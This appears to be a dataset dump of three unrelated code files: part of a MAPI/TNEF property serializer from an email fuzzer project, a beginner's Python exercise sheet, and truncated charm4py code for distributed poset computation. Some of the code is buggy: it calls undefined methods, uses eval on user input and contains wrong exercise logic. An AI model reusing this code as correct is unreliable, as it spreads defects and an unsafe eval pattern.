MapiProps.convertGuid(self.guid)\r\n if isinstance(self.map, basestring):\r\n ret += struct.pack('I', self.IDTYPE_STRING)\r\n ret += MapiProps.convertUnicode(self.map)\r\n else:\r\n ret += struct.pack('I', self.IDTYPE_NUMBER)\r\n ret += struct.pack('I', self.map)\r\n if self.data is not None:\r\n ret += self.data\r\n return ret\r\n\r\n class BinStream:\r\n\r\n def __init__(self, data, version=2, type=1, flags=1):\r\n self.data = data\r\n self.version = version\r\n self.type = type\r\n self.flags = flags\r\n self.reserved = \"\\x00\" * 28\r\n\r\n def dump(self):\r\n ret = struct.pack('III', self.version, self.type, self.flags)\r\n ret += self.reserved\r\n ret += struct.pack(\"I\", len(self.data))\r\n ret += self.data\r\n return ret\r\n\r\n def __init__(self):\r\n self.clear()\r\n\r\n @staticmethod\r\n def parse(fp, sz, dump=None, dfile=None):\r\n ln = struct.unpack(\"I\", fp.read(4))[0]\r\n print >> sys.stderr, \"MapiProps\", ln, \":\"\r\n e = MapiEnum()\r\n for i in range(ln):\r\n pid = struct.unpack(\"I\", fp.read(4))[0]\r\n spec = ''\r\n if pid > 0x80000000:\r\n g = uuid.UUID(bytes_le=fp.read(16))\r\n spec = str(g) + '_'\r\n tp, lid = struct.unpack(\"II\", fp.read(8))\r\n if tp == 0:\r\n spec += str(lid)\r\n else:\r\n bts = lid * 2\r\n spec += fp.read(bts - 2).decode(\"utf-16le\")\r\n fp.read(2 + 0 if (bts % 4) == 0 else 2)\r\n tp = pid & 0x7FFF\r\n if pid & 0x1000 or tp in [e.PT_STRING8, e.PT_UNICODE, e.PT_OBJECT, e.PT_BINARY]:\r\n arr = struct.unpack(\"I\", fp.read(4))[0]\r\n else:\r\n arr = 1\r\n data = []\r\n pidfmt = \"{:08X}\".format(pid)\r\n nm = e.getName(pid)\r\n for x in range(arr):\r\n if tp in [e.PT_NULL, e.PT_NONE]:\r\n continue\r\n if tp == e.PT_I2:\r\n data += struct.unpack(\"I\", fp.read(4))\r\n elif tp in [e.PT_R4, e.PT_LONG, e.PT_ERROR, e.PT_BOOLEAN]:\r\n data += struct.unpack(\"I\", fp.read(4))\r\n elif tp in [e.PT_I8, e.PT_DOUBLE, e.PT_CURRENCY, e.PT_SYSTIME, e.PT_APPTIME]:\r\n data += struct.unpack(\"Q\", fp.read(8))\r\n elif tp == e.PT_CLSID:\r\n data += [uuid.UUID(bytes_le=fp.read(16))]\r\n elif tp in [e.PT_STRING8, e.PT_UNICODE, e.PT_OBJECT, e.PT_BINARY]:\r\n bsz = struct.unpack(\"I\", fp.read(4))[0]\r\n buf = fp.read(bsz)\r\n val = \":\" + str(bsz)\r\n if tp == e.PT_STRING8:\r\n val = buf[:-1]\r\n if tp == e.PT_UNICODE:\r\n val = buf[:-2].decode(\"utf-16le\")\r\n data += [val]\r\n if bsz % 4 != 0:\r\n fp.read(4 - (bsz % 4))\r\n if dump and dump in [pidfmt, nm]:\r\n with open(dfile, \"wb\") as f:\r\n f.write(buf)\r\n else:\r\n raise Exception(\"Unknown tag type: %08X\" % pid)\r\n print >> sys.stderr, \"{}:{} {} {}\".format(pidfmt, nm, spec, str(data))\r\n\r\n @staticmethod\r\n def replaceRtf(data, rtfdata):\r\n return data\r\n\r\n def clear(self):\r\n self.props = []\r\n return self\r\n\r\n def dumpTnef(self):\r\n ret = struct.pack('I', len(self.props))\r\n for x in self.props:\r\n ret += x.dumpTnef()\r\n return ret\r\n\r\n def isArr(self, data, default=True):\r\n if data is None:\r\n return default\r\n return isinstance(data, (list, tuple))\r\n\r\n def oleTime(self, dtm):\r\n if not isinstance(dtm, datetime):\r\n return dtm\r\n delta = dtm - MapiProps.OLETIME_INIT\r\n day = timedelta(days=1)\r\n return delta.total_seconds() / day.total_seconds()\r\n\r\n def sysTime(self, dtm):\r\n if not isinstance(dtm, datetime):\r\n return dtm\r\n delta = dtm - MapiProps.SYSTIME_INIT\r\n return delta.microseconds * 10\r\n\r\n @staticmethod\r\n def pad(string, padding=4):\r\n while len(string) % padding != 0:\r\n string += \"\\x00\"\r\n return string\r\n\r\n @staticmethod\r\n def convertBinary(binary):\r\n ret = struct.pack('I', len(binary))\r\n ret += binary\r\n return MapiProps.pad(ret)\r\n\r\n @staticmethod\r\n def convertString(string):\r\n return MapiProps.convertBinary(string + \"\\x00\")\r\n\r\n @staticmethod\r\n def convertUnicode(string):\r\n if not isinstance(string, unicode):\r\n string = string.decode('ascii')\r\n return MapiProps.convertBinary(string.encode('utf-16le') + \"\\x00\" * 2)\r\n\r\n @staticmethod\r\n def convertGuid(guid):\r\n return guid.bytes_le\r\n\r\n def convertData(self, propTag, data, default, converter):\r\n if data is None:\r\n data = [default] if propTag & 0x1000 != 0 else default\r\n if self.isArr(data):\r\n return [converter(x) for x in data]\r\n else:\r\n return converter(data)\r\n\r\n def addRaw(self, propTag, data, **kwargs):\r\n \"\"\"Add property\r\n \"\"\"\r\n if self.isArr(data):\r\n val = struct.pack('I', len(data))\r\n val += ''.join(data)\r\n else:\r\n val = data\r\n prop = MapiProps.Prop(propTag, val, **kwargs)\r\n self.props += [prop]\r\n return self\r\n\r\n def addFmt(self, propTag, data, fmt, **kwargs):\r\n data = self.convertData(propTag, data, 0, lambda x: struct.pack(fmt, x))\r\n return self.addRaw(propTag, data, **kwargs)\r\n\r\n def addInt16(self, propTag, data=None, **kwargs):\r\n return self.addFmt(propTag, data, 'h', **kwargs)\r\n\r\n def addInt32(self, propTag, data=None, **kwargs):\r\n return self.addFmt(propTag, data, 'i', **kwargs)\r\n\r\n def addInt64(self, propTag, data=None, **kwargs):\r\n return self.addFmt(propTag, data, 'q', **kwargs)\r\n\r\n def addFloat(self, propTag, data=None, **kwargs):\r\n return self.addFmt(propTag, data, 'f', **kwargs)\r\n\r\n def addDouble(self, propTag, data=None, **kwargs):\r\n return self.addFmt(propTag, data, 'd', **kwargs)\r\n\r\n def addCurrency(self, propTag, currencyId=None, **kwargs):\r\n return self.addInt64(propTag, currencyId, **kwargs)\r\n\r\n def addAppTime(self, propTag, dtm=None, **kwargs):\r\n data = self.convertData(propTag, dtm, datetime.now(), self.oleTime)\r\n return self.addDouble(propTag, data, **kwargs)\r\n\r\n def addError(self, propTag, data=None, **kwargs):\r\n return self.addInt32(propTag, data, **kwargs)\r\n\r\n def addBool(self, propTag, data=None, **kwargs):\r\n if data is None or isinstance(data, bool):\r\n data = 1 if data else 0\r\n return self.addInt16(propTag, data, **kwargs)\r\n\r\n def addObject(self, propTag, data=None, **kwargs):\r\n data = self.convertData(propTag, data, '', MapiProps.convertBinary)\r\n return self.addRaw(propTag, data if self.isArr(data) else [data], **kwargs)\r\n\r\n def addString(self, propTag, data=None, **kwargs):\r\n data = self.convertData(propTag, data, '', MapiProps.convertString)\r\n return self.addRaw(propTag, data if self.isArr(data) else [data], **kwargs)\r\n\r\n def addUnicode(self, propTag, data=None, **kwargs):\r\n data = self.convertData(propTag, data, '', MapiProps.convertUnicode)\r\n return self.addRaw(propTag, data if self.isArr(data) else [data], **kwargs)\r\n\r\n def addSysTime(self, propTag, dtm=None, **kwargs):\r\n data = self.convertData(propTag, dtm, datetime.now(), self.sysTime)\r\n return self.addInt64(propTag, data, **kwargs)\r\n\r\n def addGuid(self, propTag, data=None, **kwargs):\r\n data = self.convertData(propTag, data, uuid.uuid1(), MapiProps.convertGuid)\r\n return self.addRaw(propTag, data, **kwargs)\r\n\r\n def addBinary(self, propTag, data=None, **kwargs):\r\n data = self.convertData(propTag, data, '', MapiProps.convertBinary)\r\n return self.addRaw(propTag, data if self.isArr(data) else [data], **kwargs)\r\n\r\n def addBinStream(self, propTag, data=None, **kwargs):\r\n if not isinstance(data, MapiProps.BinStream):\r\n data = MapiProps.BinStream(data, **kwargs)\r\n return self.addBinary(propTag, data.dump(), **kwargs)\r\n\r\n def rtf(self, data=None, **kwargs):\r\n return self.addBinary(MapiEnum.PR_RTF_COMPRESSED, data, **kwargs)\r\n\r\n def add(self, propTag, data=None, **kwargs):\r\n tp = propTag & 0xFFFF\r\n if tp & 0x1000 != 0 and not self.isArr(data):\r\n raise MapiProps.ArrayMismatchError()\r\n if tp & 0x1000 == 0 and self.isArr(data, False):\r\n raise MapiProps.ArrayMismatchError()\r\n if tp in [MapiEnum.PT_NONE, MapiEnum.PT_NULL]:\r\n return self.addRaw(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_I2, MapiEnum.PT_MV_I2]:\r\n return self.addInt16(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_LONG, MapiEnum.PT_MV_LONG]:\r\n return self.addInt32(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_LONG, MapiEnum.PT_MV_LONG]:\r\n return self.addInt32(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_R4, MapiEnum.PT_MV_R4]:\r\n return self.addFlt32(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_DOUBLE, MapiEnum.PT_MV_DOUBLE]:\r\n return self.addFlt64(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_CURRENCY, MapiEnum.PT_MV_CURRENCY]:\r\n return self.addCurrency(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_APPTIME, MapiEnum.PT_MV_APPTIME]:\r\n return self.addAppTime(propTag, data, **kwargs)\r\n elif tp == MapiEnum.PT_ERROR:\r\n return self.addError(propTag, data, **kwargs)\r\n elif tp == MapiEnum.PT_BOOLEAN:\r\n return self.addBool(propTag, data, **kwargs)\r\n elif tp == MapiEnum.PT_OBJECT:\r\n return self.addObject(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_I8, MapiEnum.PT_MV_I8]:\r\n return self.addInt64(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_STRING8, MapiEnum.PT_MV_STRING8]:\r\n return self.addString(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_UNICODE, MapiEnum.PT_MV_UNICODE]:\r\n return self.addUnicode(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_SYSTIME, MapiEnum.PT_MV_SYSTIME]:\r\n return self.addSysTime(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_CLSID, MapiEnum.PT_MV_CLSID]:\r\n return self.addGuid(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_BINARY, MapiEnum.PT_MV_BINARY]:\r\n return self.addBinary(propTag, data, **kwargs)\r\n else:\r\n raise MapiProps.WrongTypeError()\r\n","repo_name":"mypasswordisqwerty/outl64","sub_path":"fuzzer/generators/mapiprop.py","file_name":"mapiprop.py","file_ext":"py","file_size_in_byte":12888,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"8421903931","text":"#Question2\r\nprint(5**9)\r\nprint(3//2)\r\nprint(7//30)\r\nprint(7/30)\r\nprint(6 == 6)\r\na = 20\r\na+= 30\r\na%=3\r\nprint(a)\r\nprint(True * False)\r\nprint(True & False)\r\nprint(True and False)\r\nprint(((6>3) and (7<4) or (18==3)) and (9>3))\r\nprint(True is False)\r\n#print(False in ‘False’)\r\nprint(((True == False) or (False > True)) and (False <= True))\r\n\r\n#Question3\r\ns1= \"nice to have it\"\r\ns2 = \"here\"\r\nprint(s1+' '+s2)\r\n\r\n#Question4\r\na = [1,2,[3,4],[5,[100,200,['hello']],23,11],1,7]\r\nprint(a[3][1][2])\r\n\r\n#Question5\r\ns1= \"nice to have it\"\r\ns2 = \"here\"\r\na.insert(0,s1)\r\na.append(s2)\r\nprint(a)\r\n\r\n#Question6\r\nnumbers = [386, 462, 47, 418, 907, 344, 236, 375, 823, 566, 597, 978, 328, 615, \r\n953, 345, 399, 162, 758, 219, 918, 237, 412, 566, 826, 248, 866, 950, 626, 949, \r\n687, 217, 815, 67, 104, 58, 512, 24, 892, 894, 767, 553, 81, 379, 843, 831, 445, \r\n742, 717, 958,743, 527]\r\na = []\r\nfor i in numbers :\r\n if (i==237):\r\n a.append(i)\r\n break\r\n elif (i% 2 == 0):\r\n \r\n a.append(i)\r\nprint(a)\r\n\r\n#Question7\r\ncolor_list_1 = set([\"White\", \"Black\", \"Red\"]) \r\ncolor_list_2 = set([\"Red\", \"Green\"])\r\n\r\ncol = color_list_1-color_list_2\r\nprint(col)\r\n\r\n#Question8\r\nstr = \"My name is varsha jain\"\r\nif (str.isalpha()):\r\n print(\"string is pangram\")\r\nelse :\r\n print(\"string is not pangram\")\r\n\r\n#Question9\r\nn= eval(input(\"enter a number\"))\r\nsum = n + (n*10 +n)+(n*100+n*10+n)\r\nprint(sum)\r\n\r\n#Question 10\r\nn = input('enter a string')\r\nn1= n.split('#')\r\nprint(n1)\r\nl1 = n1[0].split()\r\nl2 = n1[1].split()\r\nprint(l1)\r\nprint(l2)\r\n\r\n#question 11\r\nl = input(\"enter a string\")\r\ns =l.split(',')\r\ns.sort()\r\nprint(s)\r\n\r\n#Question12\r\nd = {'Student': ['Rahul', 'Kishore', 'Vidhya', 'Raakhi'], \r\n'Marks': [57,87,67,79]}\r\nd1 = d['Marks']\r\nd2 = d['Student']\r\nprint(d1)\r\nhigh = max(d1)\r\nj=0\r\nfor i in range(len(d1)):\r\n if d1[i]==high:\r\n j =i\r\nprint(d2[j])\r\n\r\n#Question 13\r\nstr = eval(input(\"enter a string \"))\r\nc1 = 0\r\nc2 = 0\r\nfor i in str:\r\n if (i.isalpha()):\r\n c1+=1\r\n elif (i.isdigit()):\r\n c2+=1\r\nprint(\"no. of alphabets are\",c1)\r\nprint(\"no. of digits are \",c2)\r\n\r\n#Question 14\r\nd = {'Name': ['Akash', 'Soniya', 'Vishakha' , 'Akshay', 'Rahul', 'Vikas'],\r\n'Subject': ['Python', 'Java', 'Python', 'C', 'Python', 'Java'],\r\n'Ratings': [8.4, 7.8, 8, 9, 8.2, 5.6]}\r\ninp = input(\"enter subject name\")\r\nnew1 = []\r\nnew2 =[]\r\nnew3=[]\r\nsub = d['Subject']\r\nl1 = d['Name']\r\nl2=d['Ratings']\r\nfor i in range(len(sub)):\r\n if sub[i] == inp:\r\n new1+=sub[i]\r\n new2+=l1[i]\r\n new3+=l2[i]\r\nd1={}\r\nd1['Name']=new2\r\nd1['Subject']=new1\r\nd1['Ratings']=new3\r\nprint(d1)\r\n \r\n\r\n\r\n \r\n","repo_name":"jain-varsha24/15novml","sub_path":"sheet1.py","file_name":"sheet1.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16016715591","text":"import charm4py\nfrom charm4py import charm, Chare, coro, Reducer, Group, Future, Array, Channel\nimport cdd\nimport numpy as np\nfrom copy import copy, deepcopy\nimport time\nimport itertools\nfrom functools import partial\nfrom collections import defaultdict\nimport encapsulateLP\nimport DistributedHash\nimport cvxopt\nfrom cylp.cy import CyClpSimplex\nfrom cylp.py.modeling.CyLPModel import CyLPArray\nimport sys\nimport warnings\nimport numba as nb\nimport random\n# import TLLHypercubeReach\nimport posetFastCharm_numba\nimport region_helpers\nfrom region_helpers import hashNodeBytes, tupToBytes, bytesToList\n\nwarnings.simplefilter(action = \"ignore\", category = RuntimeWarning)\n\n\nclass PosetNode(DistributedHash.Node):\n # DO NOT OVERRIDE PARENT'S __init__() method\n # DistributedHash will create a local property with a proxy, self.localProxy, that we can call\n # (we will use this to make sure that any necessary variables are copied to the required PEs)\n # DistributedHash will also add a property called parentChare to allow acces to data on the hash worker\n def dummy(self):\n pass\n # These methods are optional, and will be called at an appropriate time by DistributedHash if present\n def init(self):\n self.constraints = self.localProxy[self.storePe].getConstraintsOnly(ret=True).get()\n\n # def update(self):\n # pass\n\n # def check(self):\n # pass\n def update(self, lsb,msb,nodeBytes,N, originPe, face, witness, adj, *args):\n self.face |= set(face)\n if adj and isinstance(adj,dict):\n for ky in adj.keys():\n self.adj[ky] = adj[ky]\n\n def checkForInsert(self):\n return True\n\n def updateForInsert(self, lsb, msb, nodeBytes, N, originPe, face, witness, adj, *args):\n self.update(lsb, msb, nodeBytes, N, originPe, face, witness, adj, *args)\n\n\nclass localVar(Chare):\n def init(self,succGroupProxy,posetPElist):\n self.posetSuccGroupProxy = succGroupProxy\n self.posetPElist = posetPElist\n self.schedCount = 0\n # self.closedCalls = []\n self.skip = False\n self.counterExample = None\n def setConstraintsOnly(self,constraints):\n self.constraints = constraints\n self.schedCount = 0\n self.skip = False\n def getConstraintsOnly(self):\n return self.constraints\n # This method **must** be implemented for DistributedHash to work:\n @coro\n def getSchedCount(self):\n return self.schedCount\n def setSkip(self,val):\n # print('Executing setSkip on PE ' + str(charm.myPe()))\n self.skip = val\n # return 37\n @coro\n def reset(self):\n self.skip = False\n self.schedCount = 0\n @coro\n def schedRandomPosetPe(self):\n # self.schedCount += 1\n return random.choice(self.posetPElist)\n @coro\n def checkNode(self, *args):\n return True\n @coro\n def checkNodeRS(self,*args):\n return True\n @coro\n def checkForInsert(self):\n pass\n\nclass Poset(Chare):\n\n @coro\n def __init__(self, peSpec, nodeConstructor, localVarGroup, successorChare, usePosetChecking, feederSpec):\n\n # self.stackNum = batchSize\n # To do: check to make sure we're passed a valid Group in localVarGroup\n self.usePosetChecking = usePosetChecking\n self.localVarGroup = localVarGroup\n self.useDefaultLocalVarGroup = False\n\n self.nodeConstructor = nodeConstructor\n if self.nodeConstructor is None:\n self.nodeConstructor = PosetNode\n self.successorChare = successorChare\n if successorChare is None:\n self.successorChare = successorWorker\n else:\n self.successorChare = successorChare\n # Create a group to paralellize the computation of successors\n # (Use all PEs unless a list was explicitly passed to us)\n if peSpec == None:\n self.posetPEs = [(0,charm.numPes(),1)]\n self.hashPEs = [(0,charm.numPes(),1)]\n else:\n self.posetPEs = peSpec['poset']\n self.hashPEs = peSpec['hash']\n\n self.posetPElist = list(itertools.chain.from_iterable( \\\n [list(range(r[0],r[1],r[2])) for r in self.posetPEs] \\\n ))\n self.hashPElist = list(itertools.chain.from_iterable( \\\n [list(range(r[0],r[1],r[2])) for r in self.hashPEs] \\\n ))\n self.succGroupFull = Group(self.successorChare,args=[])\n charm.awaitCreation(self.succGroupFull)\n\n if localVarGroup is None:\n self.useDefaultLocalVarGroup = True\n self.usePosetChecking = False\n self.localVarGroup = Group(localVar,args=[])\n charm.awaitCreation(self.localVarGroup)\n self.localVarGroup.init(self.succGroupFull,self.posetPElist,awaitable=True).get()\n\n # Create a PE scheduler Chare for use in Reverse Search implementations\n self.rsPeScheduler = Chare(peSchedulerRS,args=[self.succGroupFull,self.posetPElist],onPE=0)\n charm.awaitCreation(self.rsPeScheduler)\n\n self.succGroupFull.initPEs(self.posetPElist,localVarGroup=self.localVarGroup,rsScheduler=self.rsPeScheduler)\n secs = [self.succGroupFull[r[0]:r[1]:r[2]] for r in self.posetPEs]\n self.succGroup = charm.combine(*secs)\n successorProxies = self.succGroupFull.getProxies(ret=True).get()\n self.successorProxies = list(itertools.chain.from_iterable( \\\n [successorProxies[r[0]:r[1]:r[2]] for r in self.posetPEs] \\\n ))\n self.useGPU = False\n\n # Initialize a new distributed hash table:\n self.distHashTable = Chare(DistributedHash.DistHash,args=[\n self.succGroupFull, \\\n self.nodeConstructor, \\\n self.localVarGroup, \\\n self.hashPEs, \\\n self.posetPEs, \\\n feederSpec \\\n ],onPE=0)\n charm.awaitCreation(self.distHashTable)\n self.migrationInfo = {'poset':[(self.posetPElist,self.thisProxy), (self.posetPElist, self.rsPeScheduler)], 'hash':[(self.hashPElist,self.distHashTable)] + self.distHashTable.getMigrationInfo(ret=True).get()}\n # print('Initialized distHashTable group')\n self.oldFlippedConstraints = None\n @coro\n def init(self):\n initFut = self.distHashTable.initialize(awaitable=True)\n initFut.get()\n @coro\n def getStats(self):\n statsFut = Future()\n self.succGroupFull.getStats(statsFut)\n stats = statsFut.get()\n stats['RegionCount'] = sum(self.levelSizes) + stats['RSRegionCount']\n stats['LevelSizes'] = self.levelSizes\n return stats\n @coro\n def getMigrationInfo(self):\n return self.migrationInfo\n\n def initialize(self, AbPairs, pt, fixedA, fixedb, normalize=1.0):\n self.AbPairs = deepcopy(AbPairs)\n self.pt = pt\n self.fixedA = fixedA.copy()\n self.fixedb = fixedb.copy()\n self.normalize = normalize\n self.N = len(self.AbPairs[0][0])\n self.nrms = []\n if normalize > 0:\n for out in range(len(AbPairs)):\n self.nrms.append(self.normalize / np.linalg.norm(np.hstack([self.AbPairs[out][1].reshape(-1,1),self.AbPairs[out][0]]),axis=1).reshape(-1,1))\n self.AbPairs[out][0] = self.nrms[out] * self.AbPairs[out][0]\n self.AbPairs[out][1] = self.nrms[out] * self.AbPairs[out][1]\n nrms = np.linalg.norm(self.fixedA,axis=1).reshape(-1,1) * self.normalize\n self.fixedA = (self.normalize/nrms) * self.fixedA\n self.fixedb = (self.normalize/nrms) * self.fixedb\n else:\n for out in range(len(AbPairs)):\n self.nrms.append(np.ones((self.N,1)))\n\n\n # self.N = len(self.AbPairs[0][0])\n # self.wholeBytes = (self.N + 7) // 8\n # self.tailBits = self.N - 8*(self.N // 8)\n\n\n @coro\n def setConstraint(self,lb=0,out=0,timeout=None,prefilter=True,rebasePt=None):\n self.populated = False\n self.incomplete = True\n self.N = len(self.AbPairs[0][0])\n if prefilter:\n createConstraints = region_helpers.flipConstraintsReducedMin\n else:\n createConstraints = region_helpers.flipConstraints\n self.flippedConstraints = createConstraints( \\\n -1*self.AbPairs[out][0], \\\n self.AbPairs[out][1] - lb*self.nrms[out], \\\n self.pt, \\\n self.fixedA, \\\n self.fixedb \\\n )\n self.N = self.flippedConstraints.N\n if not rebasePt is None:\n self.flippedConstraints.setRebase(copy(rebasePt))\n\n\n stat = self.succGroup.initialize(self.N,self.flippedConstraints,timeout,awaitable=True)\n stat.get()\n if self.useDefaultLocalVarGroup:\n self.localVarGroup.setConstraintsOnly(self.flippedConstraints,awaitable=True).get()\n\n self.populated = False\n self.oldFlippedConstraints = None\n self.levelSizes = [0]\n\n return 1\n\n @coro\n def getConstraintsObject(self):\n return self.flippedConstraints\n\n @coro\n def setSuccessorCommonProperty(self,prop,val):\n self.succGroupFull.setProperty(prop,val,awaitable=True).get()\n @coro\n def getSuccGroupProxy(self):\n return self.succGroupFull\n @coro\n def getTableLen(self):\n return self.distHashTable.getTableLen(ret=True).get()\n\n @coro\n def getHashTableProxy(self):\n return self.distHashTable\n @coro\n def clearHashTable(self):\n self.distHashTable.clearHashTable(awaitable=True).get()\n @coro\n def newTable(self,tableName):\n return self.distHashTable.newTable(tableName,ret=True).get()\n @coro\n def isTable(self,tableName):\n return self.distHashTable.isTable(tableName,ret=True).get()\n @coro\n def getActiveTable(self):\n return self.distHashTable.getActiveTable(ret=True).get()\n @coro\n def activateTable(self,tableName):\n return self.distHashTable.activateTable(tableName,ret=True).get()\n @coro\n def copyTable(self,src=None,dest=None):\n return self.distHashTable.copyTable(src=src,dest=dest,ret=True).get()\n @coro\n def deleteTable(self,tableName):\n return self.distHashTable.deleteTable(tableName,ret=True).get()\n @coro\n def getTableNames(self):\n return self.distHashTable.getTableNames(ret=True).get()\n\n # Because charm4py seems to filter **kwargs, pass all arguments to populatePoset in a single dictionary.\n # This avoids having to distinguish between those arguments that are for populatePoset itself and those\n # that are merely passed on to setMethod. This is an implementation distinction not a semantic one: all\n # of these arguments affect the behavior/output of \"populatePoset\"\n\n # opts dictionary keys 'clearTable' and 'retrieveFaces' set parameters in populatePoset itself; any\n # other keys are passed as keyword arguments to setMethod\n @coro\n def populatePoset(self,face=None,witness=None,adjUpdate=None,payload=None, opts={} ):\n if self.populated:\n return\n self.clearTable = 'speed'\n self.retrieveFaces = False\n self.verbose = True\n self.sendFaces = False\n self.queryReturnInfo = False\n defaultSettings = ['clearTable','retrieveFaces','verbose','sendFaces','queryReturnInfo']\n for ky in defaultSettings:\n if ky in opts:\n setattr(self,ky,opts[ky])\n #opts.pop(ky)\n if self.clearTable and self.sendFaces:\n print(f'ERROR: \\'clearTable\\' flag is incompatible with \\'sendFaces\\'.')\n return None\n\n\n #print(f'verbose is {self.verbose}')\n self.succGroup.setMethod(**opts)\n\n if 'hashStore' in opts and opts['hashStore'] == 'vertex':\n self.hashStoreMode = 2\n tol = opts['tol'] if 'tol' in opts else 1e-9\n rTol = opts['rTol'] if 'rTol' in opts else 1e-9\n self.distHashTable.updateNodeEqualityFn(nodeType='vertex', tol=tol, rTol=rTol, H=self.flippedConstraints.constraints, awaitable=True).get()\n else:\n self.distHashTable.updateNodeEqualityFn(nodeType='standard', awaitable=True).get()\n self.hashStoreMode = 0\n\n self.distHashTable.resetLevelCount(awaitable=True).get()\n #self.succGroup.testSend()\n\n checkVal = True\n level = 0\n thisLevel = [(self.flippedConstraints.root,tuple())]\n posetLen = 1\n self.levelSizes = [1]\n timedOut = False\n\n # Send this node into the distributed hash table and check it\n initFut = Future()\n self.distHashTable.initListening(initFut,queryReturnInfo=self.queryReturnInfo,awaitable=True).get()\n initFut.get()\n self.succGroupFull.startListening(awaitable=True).get()\n\n boolIdxNoFlip = bytearray(b'\\x00') * (self.flippedConstraints.wholeBytes + (1 if self.flippedConstraints.tailBits != 0 else 0))\n for unflipIdx in range(len(thisLevel[0][0])-1,-1,-1):\n boolIdxNoFlip[thisLevel[0][0][unflipIdx]//8] = boolIdxNoFlip[thisLevel[0][0][unflipIdx]//8] | (1<<(thisLevel[0][0][unflipIdx] % 8))\n self.successorProxies[0].hashAndSend([ \\\n boolIdxNoFlip, \\\n thisLevel[0][0], \\\n self.flippedConstraints.N, \\\n tuple() if face is None else face, \\\n self.flippedConstraints.pt if witness is None else witness \\\n ], \\\n adjUpdate=(False if not adjUpdate else adjUpdate), \\\n payload=(tuple() if payload is None else payload), \\\n vertex=(None if self.hashStoreMode != 2 else (self.flippedConstraints.pt,tuple())), \\\n ret=True).get()\n thisLevel = [( \\\n boolIdxNoFlip if self.hashStoreMode == 1 else thisLevel[0][0], \\\n self.flippedConstraints.N, \\\n 0, \\\n tuple() if face is None else face, \\\n self.flippedConstraints.pt if witness is None else witness, \\\n False if not adjUpdate else adjUpdate, \\\n tuple() if payload is None else payload\n )]\n\n self.distHashTable.awaitPending(usePosetChecking=self.usePosetChecking, awaitable=True).get()\n # Send a final termination signal:\n self.succGroup.sendAll(-2,awaitable=True).get()\n self.succGroup.closeQueryChannels(awaitable=True).get()\n self.succGroup.flushMessages(ret=True).get()\n\n checkVal = self.distHashTable.levelDone(ret=True).get()\n if not checkVal:\n level = self.N+2\n listenerCount = self.distHashTable.awaitShutdown(ret=True).get()\n\n # If clearTable is set, then the result won't be the full table, so might as well\n # clear what we have in there already (I'm torn about the logic of this behavior...)\n if self.clearTable:\n self.distHashTable.clearHashTable(awaitable=True).get()\n\n doneFuts = [Future() for k in range(len(self.successorProxies))]\n for k in range(len(self.successorProxies)):\n self.successorProxies[k].initList( doneFuts[k] )\n cnt = 0\n for fut in charm.iwait(doneFuts):\n cnt += fut.get()\n\n iFut = Future()\n self.successorProxies[0].initListNew(thisLevel,iFut)\n iFut.get()\n nextLevelSize = 1\n\n # print('Waiting for level done')\n while level < self.N+1 and nextLevelSize > 0:\n # successorProxies = self.succGroup.getProxies(ret=True).get()\n # doneFuts = [Future() for k in range(len(self.successorProxies))]\n # for k in range(len(self.successorProxies)):\n # self.successorProxies[k].initListNew( \\\n # [ i for i in thisLevel[k:len(thisLevel):len(self.posetPElist)] ], \\\n # doneFuts[k]\n # )\n # cnt = 0\n # for fut in charm.iwait(doneFuts):\n # cnt += fut.get()\n\n initFut = Future()\n self.distHashTable.initListening(initFut,queryReturnInfo=self.queryReturnInfo,awaitable=True).get()\n initFut.get()\n self.succGroupFull.startListening(awaitable=True).get()\n\n if not self.useGPU:\n self.succGroup.computeSuccessorsNew(ret=True).get()\n else:\n self.succGroup.computeSuccessorsNewGPU(ret=True).get()\n timedOut = any(self.succGroupFull.getTimeout(ret=True).get())\n if timedOut:\n print('Received timeout on level ' + str(level))\n\n self.distHashTable.awaitPending(usePosetChecking=self.usePosetChecking, awaitable=True).get()\n self.succGroup.sendAll(-2,awaitable=True).get()\n self.succGroup.closeQueryChannels(awaitable=True).get()\n self.succGroup.flushMessages(ret=True).get()\n\n # print('Finished looking for successors on level ' + str(level))\n checkVal = self.distHashTable.levelDone(ret=True).get()\n if not checkVal or timedOut:\n if timedOut: checkVal = None\n break\n # print('Done with level ' + str(level))\n\n # Retrieve faces for all the nodes in the current level\n # print(nextLevelSize)\n if self.retrieveFaces:\n facesFuts = [Future() for _ in range(len(self.posetPElist))]\n for k in range(len(facesFuts)):\n self.succGroupFull[self.posetPElist[k]].retrieveFaces(facesFuts[k])\n faces = {}\n for fut in charm.iwait(facesFuts):\n retPe, facesList = fut.get()\n faces[retPe] = facesList\n\n # nextLevel = self.distHashTable.getLevelList(ret=True).get()\n prevLevelSize = nextLevelSize\n\n nextLevelSize = self.distHashTable.scheduleNextLevel(clearTable=(self.clearTable == 'memory'),ret=True).get()\n self.levelSizes.append(nextLevelSize)\n\n listenerCount = self.distHashTable.awaitShutdown(ret=True).get()\n\n if self.clearTable == 'speed':\n self.distHashTable.clearHashTable(awaitable=True).get()\n\n\n posetLen += nextLevelSize\n # print(posetLen)\n if self.verbose:\n print(f'Finished level {level} of size {prevLevelSize}')\n\n\n # thisLevel = nextLevel\n level += 1\n\n # Note, this print has to go here because this coroutine is only suspending until checkNodes is set\n statsFut = Future()\n self.succGroupFull.getStats(statsFut)\n stats = statsFut.get()\n if self.verbose:\n stats['levelSizes'] = self.levelSizes\n print('Total LPs used: ' + str(stats))\n\n print('Checker returned value: ' + str(checkVal))\n\n # print('Computed a (partial) poset of size: ' + str(len(self.hashTable.keys())))\n print('Computed a (partial) poset of size: ' + str(posetLen))\n\n if timedOut:\n print('Poset computation timed 